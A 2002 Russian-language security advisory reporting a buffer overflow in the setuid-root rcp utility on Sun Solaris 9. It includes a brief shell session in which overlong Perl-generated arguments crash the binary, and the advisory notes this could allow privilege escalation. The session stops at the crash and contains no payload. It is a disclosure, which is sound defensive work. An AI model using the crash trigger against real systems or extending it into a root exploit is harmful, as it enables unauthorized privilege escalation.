Security Lab

Переполнение буфера в Sun Solaris

Дата публикации:26.06.2002
Всего просмотров:1215
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: В Sun Solaris обнаружено переполнение буфера в rcp. Локальное выполнение RPC с длинными параметрами командной строки (destination host name, и destination file name) может привести к ошибке сегментации. Так как rcp - setuid root, уязвимость может использоваться для поднятия привилегий.

Уязвимость обнаружена в Sun Solaris 9.0

Пример:

bash-2.05$ uname -a
SunOS solaris9 5.9 Generic sun4u sparc SUNW,Ultra-5_10
bash-2.05$ ls -l /usr/sbin/static/rcp
-r-sr-xr-x   1 root     bin       787700 Apr  6 16:58 /usr/sbin/static/rcp
bash-2.05$ /usr/sbin/static/rcp `perl -e 'print "A" x 10000'` `perl -e 
'print "A" x 10000'`:`perl -e 'print "A" x 10000'`
Segmentation Fault
bash-2.05$ gdb 
bash: gdb: command not found
bash-2.05$
Ссылки: solaris 9 sparc rcp